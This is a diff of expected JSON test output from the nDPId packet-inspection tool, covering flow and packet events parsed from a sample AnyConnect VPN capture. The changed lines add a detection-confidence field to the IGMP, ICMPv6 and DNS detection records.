+00589{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241656,"flow_last_seen":1569687241656,"flow_idle_time":120000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1569687241656,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569687241656,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"ts_msec":1569687241656,"pkt":"MzMAAAABLH6BsEqhht1gAAAAAHg6\/\/6AAAAAAAAALn6B\/\/6wSqH\/AgAAAAAAAAAAAAAAAAABhgBH5kDAALQAAAAAAAAAABkFAAAAAVGAIAEFWP7tAAAAAAAAAAAAASABBVj+7QAAAAAAAAAAAAIDBEDAAAL9HQAC\/R0AAAAAJgEGRoQCRLAAAAAAAAAAABgDAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAEBLH6BsEqh"}
-00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241656,"flow_last_seen":1569687241656,"flow_idle_time":120000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1569687241656,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241656,"flow_last_seen":1569687241656,"flow_idle_time":120000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1569687241656,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00535{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569687241657,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"ts_msec":1569687241657,"pkt":"AQBeAAD7pHczjPFACABGwAAgAABAAAEC+IcKAACV4AAA+5QEAAAWAAkE4AAA+w=="}
-00568{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569687242068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569687242068,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/8\/+wAAAgQFtAEDAwUBAQgKHA1tlQAAAAAEAgAA"}
 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569687242271,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"ts_msec":1569687242271,"pkt":"AQBefwMWpHczjPFACABGwAAgAABAAAEC5m0KAACV7\/8DFpQEAAAWAPbp7\/8DFg=="}
-00569{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00539{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569687242476,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"ts_msec":1569687242476,"pkt":"AQBef\/\/6pHczjPFACABGwAAgAABAAAEC6YgKAACV7\/\/\/+pQEAAAWAPoE7\/\/\/+g=="}
-00572{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1569687243071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569687243071,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/88EwAAAgQFtAEDAwUBAQgKHA1xfQAAAAAEAgAA"}
 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569687244524,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"ts_msec":1569687244524,"pkt":"MzMAAAABLH6BsEqhht1gAAAAAHg6\/\/6AAAAAAAAALn6B\/\/6wSqH\/AgAAAAAAAAAAAAAAAAABhgBH5kDAALQAAAAAAAAAABkFAAAAAVGAIAEFWP7tAAAAAAAAAAAAASABBVj+7QAAAAAAAAAAAAIDBEDAAAL9HQAC\/R0AAAAAJgEGRoQCRLAAAAAAAAAAABgDAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAEBLH6BsEqh"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245251,"flow_last_seen":1569687245251,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1569687245251,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569687245251,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1569687245251,"pkt":"LH6BsEqhNDY7z3UoCABFAABE1h4AAP8RQxAKAADjS0tMTM6PADUAMDW7jEkBAAABAAAAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AAAEAAQ=="}
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245251,"flow_last_seen":1569687245251,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1569687245251,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245251,"flow_last_seen":1569687245251,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1569687245251,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569687245288,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1569687245288,"pkt":"NDY7z3UoLH6BsEqhCABFAABUAABAADYRoh9LS0xMCgAA4wA1zo8AQIZKjEmBgAABAAEAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AAAEAAcAMAAEAAQAAADwABAglZls="}
-00756{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1569687245288,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"8.37.102.91"}}
+00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1569687245288,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"8.37.102.91"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245295,"flow_last_seen":1569687245295,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1569687245295,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1569687245295,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1569687245295,"pkt":"LH6BsEqhNDY7z3UoCABFAABE77wAAEAR6XMKAADjS0tLS+\/LADUAMHT3LLcBAAABAAAAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAQ=="}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245295,"flow_last_seen":1569687245295,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1569687245295,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245295,"flow_last_seen":1569687245295,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1569687245295,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1569687245320,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"ts_msec":1569687245320,"pkt":"NDY7z3UoLH6BsEqhCABFAACVAABAADoRnt9LS0tLCgAA4wA178sAgY60LLeBgAABAAAAAQAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAcAYAAYAAQAAA4QARQZucy02MzIJYXdzZG5zLTE1A25ldAARYXdzZG5zLWhvc3RtYXN0ZXIGYW1hem9uwB8AAAABAAAcIAAAA4QAEnUAAAFRgA=="}
-00756{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1569687245320,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1569687245320,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245321,"flow_last_seen":1569687245321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1569687245321,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569687245321,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1569687245321,"pkt":"LH6BsEqhNDY7z3UoCABFAABEwHQAAEARF7sKAADjS0tMTPNyADUAMHBPLLcBAAABAAAAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAQ=="}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245321,"flow_last_seen":1569687245321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1569687245321,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245321,"flow_last_seen":1569687245321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1569687245321,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569687245366,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"ts_msec":1569687245366,"pkt":"NDY7z3UoLH6BsEqhCABFAACVAABAADYRod5LS0xMCgAA4wA183IAgYoMLLeBgAABAAAAAQAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAcAYAAYAAQAAA4QARQZucy02MzIJYXdzZG5zLTE1A25ldAARYXdzZG5zLWhvc3RtYXN0ZXIGYW1hem9uwB8AAAABAAAcIAAAA4QAEnUAAAFRgA=="}
-00756{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1569687245366,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1569687245366,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245379,"flow_last_seen":1569687245379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569687245379,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
